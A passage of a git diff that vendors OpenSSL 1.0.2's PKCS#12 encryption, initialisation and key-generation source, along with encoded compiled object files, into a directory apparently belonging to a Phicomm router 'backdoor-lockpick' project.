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
I;aNQXzkciJrT_o{

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_decr.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_decr.c
new file mode 100644
index 0000000..b40ea10
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_decr.c
@@ -0,0 +1,202 @@
+/* p12_decr.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/pkcs12.h>
+
+/* Define this to dump decrypted output to files called DERnnn */
+/*
+ * #define DEBUG_DECRYPT
+ */
+
+/*
+ * Encrypt/Decrypt a buffer based on password and algor, result in a
+ * OPENSSL_malloc'ed buffer
+ */
+
+unsigned char *PKCS12_pbe_crypt(X509_ALGOR *algor, const char *pass,
+                                int passlen, unsigned char *in, int inlen,
+                                unsigned char **data, int *datalen, int en_de)
+{
+    unsigned char *out;
+    int outlen, i;
+    EVP_CIPHER_CTX ctx;
+
+    EVP_CIPHER_CTX_init(&ctx);
+    /* Decrypt data */
+    if (!EVP_PBE_CipherInit(algor->algorithm, pass, passlen,
+                            algor->parameter, &ctx, en_de)) {
+        PKCS12err(PKCS12_F_PKCS12_PBE_CRYPT,
+                  PKCS12_R_PKCS12_ALGOR_CIPHERINIT_ERROR);
+        return NULL;
+    }
+
+    if (!(out = OPENSSL_malloc(inlen + EVP_CIPHER_CTX_block_size(&ctx)))) {
+        PKCS12err(PKCS12_F_PKCS12_PBE_CRYPT, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    if (!EVP_CipherUpdate(&ctx, out, &i, in, inlen)) {
+        OPENSSL_free(out);
+        out = NULL;
+        PKCS12err(PKCS12_F_PKCS12_PBE_CRYPT, ERR_R_EVP_LIB);
+        goto err;
+    }
+
+    outlen = i;
+    if (!EVP_CipherFinal_ex(&ctx, out + i, &i)) {
+        OPENSSL_free(out);
+        out = NULL;
+        PKCS12err(PKCS12_F_PKCS12_PBE_CRYPT,
+                  PKCS12_R_PKCS12_CIPHERFINAL_ERROR);
+        goto err;
+    }
+    outlen += i;
+    if (datalen)
+        *datalen = outlen;
+    if (data)
+        *data = out;
+ err:
+    EVP_CIPHER_CTX_cleanup(&ctx);
+    return out;
+
+}
+
+/*
+ * Decrypt an OCTET STRING and decode ASN1 structure if zbuf set zero buffer
+ * after use.
+ */
+
+void *PKCS12_item_decrypt_d2i(X509_ALGOR *algor, const ASN1_ITEM *it,
+                              const char *pass, int passlen,
+                              ASN1_OCTET_STRING *oct, int zbuf)
+{
+    unsigned char *out;
+    const unsigned char *p;
+    void *ret;
+    int outlen;
+
+    if (!PKCS12_pbe_crypt(algor, pass, passlen, oct->data, oct->length,
+                          &out, &outlen, 0)) {
+        PKCS12err(PKCS12_F_PKCS12_ITEM_DECRYPT_D2I,
+                  PKCS12_R_PKCS12_PBE_CRYPT_ERROR);
+        return NULL;
+    }
+    p = out;
+#ifdef DEBUG_DECRYPT
+    {
+        FILE *op;
+
+        char fname[30];
+        static int fnm = 1;
+        sprintf(fname, "DER%d", fnm++);
+        op = fopen(fname, "wb");
+        fwrite(p, 1, outlen, op);
+        fclose(op);
+    }
+#endif
+    ret = ASN1_item_d2i(NULL, &p, outlen, it);
+    if (zbuf)
+        OPENSSL_cleanse(out, outlen);
+    if (!ret)
+        PKCS12err(PKCS12_F_PKCS12_ITEM_DECRYPT_D2I, PKCS12_R_DECODE_ERROR);
+    OPENSSL_free(out);
+    return ret;
+}
+
+/*
+ * Encode ASN1 structure and encrypt, return OCTET STRING if zbuf set zero
+ * encoding.
+ */
+
+ASN1_OCTET_STRING *PKCS12_item_i2d_encrypt(X509_ALGOR *algor,
+                                           const ASN1_ITEM *it,
+                                           const char *pass, int passlen,
+                                           void *obj, int zbuf)
+{
+    ASN1_OCTET_STRING *oct = NULL;
+    unsigned char *in = NULL;
+    int inlen;
+    if (!(oct = M_ASN1_OCTET_STRING_new())) {
+        PKCS12err(PKCS12_F_PKCS12_ITEM_I2D_ENCRYPT, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+    inlen = ASN1_item_i2d(obj, &in, it);
+    if (!in) {
+        PKCS12err(PKCS12_F_PKCS12_ITEM_I2D_ENCRYPT, PKCS12_R_ENCODE_ERROR);
+        goto err;
+    }
+    if (!PKCS12_pbe_crypt(algor, pass, passlen, in, inlen, &oct->data,
+                          &oct->length, 1)) {
+        PKCS12err(PKCS12_F_PKCS12_ITEM_I2D_ENCRYPT, PKCS12_R_ENCRYPT_ERROR);
+        OPENSSL_free(in);
+        goto err;
+    }
+    if (zbuf)
+        OPENSSL_cleanse(in, inlen);
+    OPENSSL_free(in);
+    return oct;
+ err:
+    if (oct)
+        ASN1_OCTET_STRING_free(oct);
+    return NULL;
+}
+
+IMPLEMENT_PKCS12_STACK_OF(PKCS7)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_decr.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_decr.o
new file mode 100644
index 0000000000000000000000000000000000000000..af541c6e59491c5d50a8b3372ab59c9237704f12
GIT binary patch
literal 4312
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_init.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_init.c
new file mode 100644
index 0000000..0322df9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_init.c
@@ -0,0 +1,92 @@
+/* p12_init.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/pkcs12.h>
+
+/* Initialise a PKCS12 structure to take data */
+
+PKCS12 *PKCS12_init(int mode)
+{
+    PKCS12 *pkcs12;
+    if (!(pkcs12 = PKCS12_new())) {
+        PKCS12err(PKCS12_F_PKCS12_INIT, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+    ASN1_INTEGER_set(pkcs12->version, 3);
+    pkcs12->authsafes->type = OBJ_nid2obj(mode);
+    switch (mode) {
+    case NID_pkcs7_data:
+        if (!(pkcs12->authsafes->d.data = M_ASN1_OCTET_STRING_new())) {
+            PKCS12err(PKCS12_F_PKCS12_INIT, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+        break;
+    default:
+        PKCS12err(PKCS12_F_PKCS12_INIT, PKCS12_R_UNSUPPORTED_PKCS12_MODE);
+        goto err;
+    }
+
+    return pkcs12;
+ err:
+    if (pkcs12 != NULL)
+        PKCS12_free(pkcs12);
+    return NULL;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_init.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_init.o
new file mode 100644
index 0000000000000000000000000000000000000000..0fbdb1f49df2992e5bebcaac383d6cec6cb8e52f
GIT binary patch
literal 2064
zcmbW1&ubG=5XUD;wY9d}_zMCR30OqYF4<bJtsvQi&5s&VNm3AOS(A2atIZ~Cc4^~5
zg;F8ZgWf#!;L*RqLtD^`H~#}Y2o^kvH!IYc-S?W!y1DcVvv1z#&AfSeKk{73rGkL~
za0TEFw0oQaeCcWXaodf<APm6op-X?{(rmGHuunAG`jpw+vxXIEPx|~pMzT}I&+cXX
z*a1KF%+|zCh<CGFt0UpoS9>VaQX(4%7p#%&*4#*VmkKhTjMAjz?MZ+3JN_ER&<Z?7
za;+bV^xaO*wZ1)=m*+l0I+>h`UY)I2x@kox#hYSmRJvu^UFq3aOpJ|Rb1+VcqUvF^
z6KLuDECd1eh|$VP=bZ)uPYV!O4+n+^di!4E#@#@Ek&V5lHYJ2#1!W=fG9(Mpjh^7P
z5Rrv&Lg-^bT^c%r9{6?WHyrXkAzB+>U1wIv{xzM9dLcOZKeTyo7w*64kiAQtDFfI&
z>sqJ17sw)Lw69)?2>keD7oP6I?|0#gU3jw#hq^STuIMYKxB&O=CX1{GYC1QQkaOxx
zDpgcUYDrGy6qQHl+8QW@f?BssRWpp50dg@fso8u<Nh<}lp_wp~m{#?b#j#rDu`^gK
z6|(uXYBuYdO8KnVlA&q1G&oHk6x}`Y{~kJ`dqyHod(HW6f+*sHXq?l2k%$XuoT~&;
z#D~y0e?t)EoqyZGHmCFA@lnR{ozPopOKdc&X1M}l!!(?BnR|w|S{6-h-2`#5Y?eW+
zG#Vf-)T&iYN2b?IO~ki1+AzxtPgwtvZi#iHR@V%(38FoNwyZ80<*L11?YhVGqL@c-
z&-*gs$VmJiJ3S|s`_vAj(VoT8+<M2JCeQE3L8`-F6uk@56*S`Bm%LAdKB8E+=w8sA
z$IX{8m*$M2xy9>WcSH1fecn#Fm^<_w4{$@D*lA?+@6&OIupeRhQS{y7`^Q-Y9SZg4
zPq6$94`i)3e;&Et`DF;A_&L$}Q7+Ht+^;s}y<qj<vX<WRDW7~|-m^ml5e7G@;}V<h
Uh@3&sFaIH1|LRes<9PG`0R{u-rT_o{

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_key.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_key.c
new file mode 100644
index 0000000..99b8260
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_key.c
@@ -0,0 +1,238 @@
+/* p12_key.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/pkcs12.h>
+#include <openssl/bn.h>
+
+/* Uncomment out this line to get debugging info about key generation */
+/*
+ * #define DEBUG_KEYGEN
+ */
+#ifdef DEBUG_KEYGEN
+# include <openssl/bio.h>
+extern BIO *bio_err;
+void h__dump(unsigned char *p, int len);
+#endif
+
+/* PKCS12 compatible key/IV generation */
+#ifndef min
+# define min(a,b) ((a) < (b) ? (a) : (b))
+#endif
+
+int PKCS12_key_gen_asc(const char *pass, int passlen, unsigned char *salt,
+                       int saltlen, int id, int iter, int n,
+                       unsigned char *out, const EVP_MD *md_type)
+{
+    int ret;
+    unsigned char *unipass;
+    int uniplen;
+
+    if (!pass) {
+        unipass = NULL;
+        uniplen = 0;
+    } else if (!OPENSSL_asc2uni(pass, passlen, &unipass, &uniplen)) {
+        PKCS12err(PKCS12_F_PKCS12_KEY_GEN_ASC, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    ret = PKCS12_key_gen_uni(unipass, uniplen, salt, saltlen,
+                             id, iter, n, out, md_type);
+    if (ret <= 0)
+        return 0;
+    if (unipass) {
+        OPENSSL_cleanse(unipass, uniplen); /* Clear password from memory */
+        OPENSSL_free(unipass);
+    }
+    return ret;
+}
+
+int PKCS12_key_gen_uni(unsigned char *pass, int passlen, unsigned char *salt,
+                       int saltlen, int id, int iter, int n,
+                       unsigned char *out, const EVP_MD *md_type)
+{
+    unsigned char *B, *D, *I, *p, *Ai;
+    int Slen, Plen, Ilen, Ijlen;
+    int i, j, u, v;
+    int ret = 0;
+    BIGNUM *Ij, *Bpl1;          /* These hold Ij and B + 1 */
+    EVP_MD_CTX ctx;
+#ifdef  DEBUG_KEYGEN
+    unsigned char *tmpout = out;
+    int tmpn = n;
+#endif
+
+#if 0
+    if (!pass) {
+        PKCS12err(PKCS12_F_PKCS12_KEY_GEN_UNI, ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+#endif
+
+    EVP_MD_CTX_init(&ctx);
+#ifdef  DEBUG_KEYGEN
+    fprintf(stderr, "KEYGEN DEBUG\n");
+    fprintf(stderr, "ID %d, ITER %d\n", id, iter);
+    fprintf(stderr, "Password (length %d):\n", passlen);
+    h__dump(pass, passlen);
+    fprintf(stderr, "Salt (length %d):\n", saltlen);
+    h__dump(salt, saltlen);
+#endif
